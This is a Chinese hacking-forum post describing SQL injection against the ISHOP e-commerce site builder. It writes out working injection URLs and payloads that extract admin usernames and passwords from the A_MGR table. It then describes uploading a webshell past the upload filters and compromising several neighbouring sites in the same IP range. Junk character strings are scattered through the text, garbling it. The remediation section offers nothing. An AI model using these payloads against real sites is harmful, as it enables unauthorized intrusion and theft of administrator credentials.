中国网络渗透测试联盟

标题: ISHOP商场建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:40
标题: ISHOP商场建站系统注入漏洞
发现一个注入点% y  b2 B$ G  Y& O
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
6 L1 F2 b- ~9 L) R- J7 w/ D6 h# D. o1 X; a
习惯性的加’having1=1--6 _( _5 P( d; c- a1 \( n  \
8 |& K4 a- M" w1 Q8 Z
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—$ Y0 R6 p5 J3 r; f4 \3 h

1 p. r9 m( `  D2 l) c* T: V0
9 d$ s4 J1 z* S4 |! b; e. b
% G# i& a- N2 F8 K爆出Diary_A.dl_Title(这时候很激动啊)* j2 V5 k' A3 {/ q

; ^* s  |: r  {4 K. O1 h9 [; T那么继续5 \( A1 o4 {% [, C! b$ |7 P
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—$ C6 }- f9 x, R7 l$ s* F! |

. _  o4 V/ J" C9 s& H8 m继续,一直爆下去. ]" D1 i1 C8 _5 U
9 ^7 v) L2 ?. P1 C( h8 W8 G
爆到几个字段和表段 但是没找到需要的管理用户的字段
' ^6 R6 T( C2 }! v0 ?. j. ~/ C  H+ {) V" q2 n, ?; z' D5 ]
蛋疼了 怎么办 然后去后台登陆页看源码
. F. H6 a3 k: U6 ~3 }6 C! ^& f" A2 w+ A6 V4 S1 ~# Y
0
' G$ `  V: ^4 Q+ @& T
1 L: G- I( D+ f1 H- C2 tInput name= “ADUID”
0 o/ K3 p0 {# J" Z* ^Input name= “ADPWD”8 |/ g2 [% a0 l# d4 ~1 ]1 R
( t$ n% \/ v; K
很幸运 找到了字段那就继续. y$ ^# D# f4 o( `) h, q
找到之后开始爆用户/ d. S4 z1 j  D
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
0 i: Z7 v& m, w; _0 `+ g爆密码
) U3 t6 d: ]4 A% ?( X! \http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
6 ~. {$ Z) x/ x# g2 }测试了下 这个注入点只能爆到文章哪里的表
. d8 k. U5 F: m& R9 q+ G; s7 q% d6 r  _) g8 T
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
% H2 j( x3 c) A+ O6 n
% e/ T# L* C7 n# [1 J3 v7 H$ X. P又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了5 P. N+ B: H' t4 S; r

& a1 \0 T8 E% Y) Z3 q& o8 n473
4 i+ ^9 Z1 U2 f+ ^# @- v4 g1 g! h
进后台! }: U. B4 B: t) g. @8 I
0 l- M3 s& l5 s* e/ s* K, P
" z& B* z* t- y$ k% w
发现几个上传点 有的地方不能上传 而且防止恶意代码
2 D' _' m* u" c! m. y3 f% k- M0 @. Z: K$ O# A9 y
没办法 各种百度各种找大牛 找到一只好像可以突破的马
$ Y6 E2 ~5 Y$ L7 `1 P
; _1 W9 l+ K( Z4 T; p6 b) q
. ?7 }+ i; z8 @$ t6 L  c! K( A8 N在系统管理那里直接上传 不过没有显示地址" z  K7 A9 a, |+ S6 @7 S

* q6 `5 a4 S  T& s3 S再上传一次 抓包 搞定OK
/ f9 _; O; K- }; c9 |4 L7 p6 V5 n9 D  f5 r" i6 @' A
& ?+ o" |' E7 t8 L1 X

5 C( ]! I( d: o2 |: S472
& T6 u- f, n' V+ q# i) g- Z& T: i4 k; M' I- |
晚上不行了 去睡觉。。。
" X0 b% i- H, ?0 F- O9 G. o! X% }2 o第二天刚起床 闲的没事做继续日站吧 , X) d$ A8 _8 s' k

$ C% x8 A" |$ r' M6 w$ \找个站 就把这个站的旁c扫了下/ Y0 q: N- k2 C0 d
) |* @1 c: a9 K4 O
发现c段也有一个购物站 ,然后还和这个站的模板差不多
% k+ W7 O. E( C$ O9 R+ i6 `% V* _- S# q, c- r- r( ~
就找到会员登录口测试
7 v) N, ?- W5 Q0 W, J; W9 f7 j! ?% s9 K+ X2 U; k0 G
'and (select top 1 MGR_UID from A_MGR)>0—% C& C8 t+ A# w$ c
果断爆到了 这时候我很激动 通杀! g' O; D8 R0 E1 o  `" z

8 P* Q6 e6 ~' J. w+ R再次翻c段! j* x! g* Q6 a
! E/ W* n5 S$ G: `! H$ Q; n- y& F0 q
翻出几个站 都成功拿下; ^- b' U! r5 q+ T
, a* D9 b* Y& u+ c+ h' ]
8 n. s- S" p$ g% A

, h, {+ A; J9 g/ M5 X7 w& W修复方案:
$ C2 T) W2 }1 K" _* z( [' _他们比我专业
" n" R- l: u# N4 y$ Z, H) O4 A. |$ l3 y: Y8 y
3 j  i/ a( n" J, f) y
% o, H* s$ q) Y




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2